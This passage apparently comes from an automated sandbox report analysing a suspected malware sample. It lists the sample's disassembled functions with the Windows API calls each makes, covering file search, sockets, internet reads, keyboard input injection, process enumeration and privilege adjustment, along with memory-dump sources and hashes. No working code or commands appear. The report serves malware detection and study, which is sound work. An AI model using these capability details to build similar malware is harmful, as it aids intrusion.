                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2387181109-0
                                                                                                                        • Opcode ID: 9d1260637b44cc3da4d6eabc3b645c9e0f00466f70fff01a2ab47522f6a789d8
                                                                                                                        • Instruction ID: ab8ac46f56834affceed31e8a00d84c1667fcb0944549a94fd558a1e514ce4f2
                                                                                                                        • Opcode Fuzzy Hash: 9d1260637b44cc3da4d6eabc3b645c9e0f00466f70fff01a2ab47522f6a789d8
                                                                                                                        • Instruction Fuzzy Hash: A231DE72505316AFCB20DF14D849B5BBBE9FF89310F000919F98997191DB34EA08CB92
                                                                                                                        Function 00589B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00589B78
                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00589C8B
                                                                                                                          • Part of subcall function 00583874: GetInputState.USER32 ref: 005838CB
                                                                                                                          • Part of subcall function 00583874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00583966
                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00589BA8
                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00589C75
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1972594611-438819550
                                                                                                                        • Opcode ID: cd9f255d80474b86fe1570301180a13b01a275f20cd8a6e1a37f75b96a972c19
                                                                                                                        • Instruction ID: 07fbb771b0ffd4c3c3a9af82df8d12deabb020f8fa5dcd6892961e74eb99cc67
                                                                                                                        • Opcode Fuzzy Hash: cd9f255d80474b86fe1570301180a13b01a275f20cd8a6e1a37f75b96a972c19
                                                                                                                        • Instruction Fuzzy Hash: 9341827190420AAFDF15EFA4C899AEEBFB4FF45310F244456E815B2191EB319E84CF60
                                                                                                                        Function 0052997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00529A4E
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00529B23
                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00529B36
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$LongProcWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3131106179-0
                                                                                                                        • Opcode ID: cfc1820b6075d2964fb69c04e2e07312443c4ce03a80680f2c5169791115175b
                                                                                                                        • Instruction ID: ac4656bfb01e6cd28b69ffb343ad604e2269c08c0de2d28f6bac8cdb54a34805
                                                                                                                        • Opcode Fuzzy Hash: cfc1820b6075d2964fb69c04e2e07312443c4ce03a80680f2c5169791115175b
                                                                                                                        • Instruction Fuzzy Hash: 5AA1F770108668AEE728AA2CAC9CE7F2E9DFF8B354F140609F502D77D1CB259D41D276
                                                                                                                        Function 00591806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0059304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0059307A
                                                                                                                          • Part of subcall function 0059304E: _wcslen.LIBCMT ref: 0059309B
                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0059185D
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00591884
                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 005918DB
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 005918E6
                                                                                                                        • closesocket.WSOCK32(00000000), ref: 00591915
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1601658205-0
                                                                                                                        • Opcode ID: d168676fb91f24ff3471d8d8bbbccabc734be448441b8c89ff6f3f23ac591d02
                                                                                                                        • Instruction ID: 05880092055b06d605d49a7d571dcc5d2f2ce00b9ed365500872198dffedfaf6
                                                                                                                        • Opcode Fuzzy Hash: d168676fb91f24ff3471d8d8bbbccabc734be448441b8c89ff6f3f23ac591d02
                                                                                                                        • Instruction Fuzzy Hash: 9451B275A002119FEB10AF24C88AF6A7FE5BF85718F048458F9165F3C3D771AD418BA1
                                                                                                                        Function 005A1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 292994002-0
                                                                                                                        • Opcode ID: 893a00421e68434c2c6070087901979c52133c2fde416e960db13dacc42aed01
                                                                                                                        • Instruction ID: f34e508edbbdb1eaaefda7c8993fd17b0bf63b156bacadfb7320719a1a8a5ba5
                                                                                                                        • Opcode Fuzzy Hash: 893a00421e68434c2c6070087901979c52133c2fde416e960db13dacc42aed01
                                                                                                                        • Instruction Fuzzy Hash: 1C218331740A115FE7208F2AC854B6E7FE5FF96325F198068E8468B351CB71DC46CB98
                                                                                                                        Function 00518060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                        • API String ID: 0-1546025612
                                                                                                                        • Opcode ID: 3d285605b9d2a835d8779eebecf449feb85882a3e5919315a1bb755c2c2b8fea
                                                                                                                        • Instruction ID: 8874fc9844aae64ebedaa98193ed84187a1ffb264a53b44f0b5359c1225db84e
                                                                                                                        • Opcode Fuzzy Hash: 3d285605b9d2a835d8779eebecf449feb85882a3e5919315a1bb755c2c2b8fea
                                                                                                                        • Instruction Fuzzy Hash: F8A26A74A0061ACBEF348F58C8A47FDBBB1BB54311F6485AAD815A7281EB709D85CB90
                                                                                                                        Function 00578298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 005782AA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen
                                                                                                                        • String ID: ($tb]$|
                                                                                                                        • API String ID: 1659193697-2890004336
                                                                                                                        • Opcode ID: 5fb283ef7e427f0eca6190a90db12b6a3cbba86eb4271a7777f13b7bef5ede2f
                                                                                                                        • Instruction ID: 5acc7c38a10b7b2a8190d46f6875fdd5a946307441f06f886ed1275ad3df5567
                                                                                                                        • Opcode Fuzzy Hash: 5fb283ef7e427f0eca6190a90db12b6a3cbba86eb4271a7777f13b7bef5ede2f
                                                                                                                        • Instruction Fuzzy Hash: B2323574A006059FCB28CF59D485A6ABBF0FF48710B15C96EE49ADB7A1EB70E941CB40
                                                                                                                        Function 0059A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0059A6AC
                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0059A6BA
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0059A79C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0059A7AB
                                                                                                                          • Part of subcall function 0052CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00553303,?), ref: 0052CE8A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1991900642-0
                                                                                                                        • Opcode ID: d62e762831d03fa6115a8d8a4d5a681fa4c6dcb49215e780c74006db566b0b2a
                                                                                                                        • Instruction ID: 0f7578123f3f8661b9f3d33fd859809fff861ad850c5157a9e63722a22c109ae
                                                                                                                        • Opcode Fuzzy Hash: d62e762831d03fa6115a8d8a4d5a681fa4c6dcb49215e780c74006db566b0b2a
                                                                                                                        • Instruction Fuzzy Hash: 8E512B71508311AFD710EF24D88AAABBBE8FFC9754F00491DF59597291EB30E944CBA2
                                                                                                                        Function 0057AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0057AAAC
                                                                                                                        • SetKeyboardState.USER32(00000080), ref: 0057AAC8
                                                                                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0057AB36
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0057AB88
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: a7b9e625ec7f833e5aca24eb455cca2744b0684910cfdf10f673c823141e59c6
                                                                                                                        • Instruction ID: 203444b62a6dd7f5777a18ed7777f30a5a573b2bb8ea35d84a609d72279fbf84
                                                                                                                        • Opcode Fuzzy Hash: a7b9e625ec7f833e5aca24eb455cca2744b0684910cfdf10f673c823141e59c6
                                                                                                                        • Instruction Fuzzy Hash: A8311530A40208AEFB25CA64E805BFE7FAABBC5310F04C21AF58D561D0D7748985E7A2
                                                                                                                        Function 0058CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 0058CE89
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0058CEEA
                                                                                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 0058CEFE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorEventFileInternetLastRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 234945975-0
                                                                                                                        • Opcode ID: e9c1c0924759cbf3368b07cbf4399c80d699fd6c4b22a6eae431f719e46d389b
                                                                                                                        • Instruction ID: 717ba3dc2f06fa270d90f1c0f6ecd6b7908c38c7464b4538ed53b1bc01d854b1
                                                                                                                        • Opcode Fuzzy Hash: e9c1c0924759cbf3368b07cbf4399c80d699fd6c4b22a6eae431f719e46d389b
                                                                                                                        • Instruction Fuzzy Hash: 7521B0715003059BE731EF65D949BA67FFCFB51314F10481EEA46E2151E774ED089B60
                                                                                                                        Function 00542622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0054271A
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00542724
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00542731
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3906539128-0
                                                                                                                        • Opcode ID: afa0bad793a59e7ef57cef759c7177a981d01b9904b6c01d6fc933f25c2b7c4e
                                                                                                                        • Instruction ID: a7e356534833ece82dee2b925e8f95037e498253b70cb1e6148de0dc3a26d460
                                                                                                                        • Opcode Fuzzy Hash: afa0bad793a59e7ef57cef759c7177a981d01b9904b6c01d6fc933f25c2b7c4e
                                                                                                                        • Instruction Fuzzy Hash: EA31C27490122DABCB21DF68DD887DCBBB8BF18310F5041EAE80CA6260E7309F859F44
                                                                                                                        Function 005851CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 005851DA
                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00585238
                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 005852A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1682464887-0
                                                                                                                        • Opcode ID: 302896f6692914c909f31026dc2ae98f794663d7dc9fff567ab0d280a3bf993f
                                                                                                                        • Instruction ID: ccff98b3a51e8eda4305d98c6f91e0c6c59991862f3bc10c31d27e16c8ec55a6
                                                                                                                        • Opcode Fuzzy Hash: 302896f6692914c909f31026dc2ae98f794663d7dc9fff567ab0d280a3bf993f
                                                                                                                        • Instruction Fuzzy Hash: EC312C75A00619DFDB00EF54D888EADBFB5FF49314F048099E805AB362DB31E85ACB90
                                                                                                                        Function 005716C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0052FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00530668
                                                                                                                          • Part of subcall function 0052FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00530685
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0057170D
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0057173A
                                                                                                                        • GetLastError.KERNEL32 ref: 0057174A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 577356006-0
                                                                                                                        • Opcode ID: 38255b3548c2efa0097e8d0c13082998118dbc2bcdff3b47a8ef988657b3b109
                                                                                                                        • Instruction ID: de28525dfd52e3a4012d6f38bbe328d96869c7069b90e1cfbbb5f54c633fd75f
                                                                                                                        • Opcode Fuzzy Hash: 38255b3548c2efa0097e8d0c13082998118dbc2bcdff3b47a8ef988657b3b109
                                                                                                                        • Instruction Fuzzy Hash: 5911CEB2400305AFD718AF58EC8AD6ABBBDFF45714B20C52EE05A57281EB70BC419B24
                                                                                                                        Function 0057D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0057D608
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0057D645
                                                                                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0057D650
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 33631002-0
                                                                                                                        • Opcode ID: c8c7cfe43975fe371337c872d3ecfa002b006c502362fbed1bf106f54566f85b
                                                                                                                        • Instruction ID: 97260a61659f020e052c7f1a407080e120ad8ae6da29ee8d527df9d05606bc67
                                                                                                                        • Opcode Fuzzy Hash: c8c7cfe43975fe371337c872d3ecfa002b006c502362fbed1bf106f54566f85b
                                                                                                                        • Instruction Fuzzy Hash: C2115E75E05228BFDB108F95EC45FAFBFBCEB45B50F108156F908E7290D6704A059BA1
                                                                                                                        Function 00571663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0057168C
                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005716A1
                                                                                                                        • FreeSid.ADVAPI32(?), ref: 005716B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3429775523-0
                                                                                                                        • Opcode ID: 94809f7e001e4ed01662eaaf9c3d4e79071f6493883b96a9ddbf9ebd256bffaa
                                                                                                                        • Instruction ID: 176b2a6727dfe6d7a91da12daf738ecc5d2fe21a0fde1488a30f27f53cf86fe0
                                                                                                                        • Opcode Fuzzy Hash: 94809f7e001e4ed01662eaaf9c3d4e79071f6493883b96a9ddbf9ebd256bffaa
                                                                                                                        • Instruction Fuzzy Hash: 89F0F47195030DFBDB00DFE49D89AAEBBBCFB08604F508565E501E2181E774AA489A54
                                                                                                                        Function 00534CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
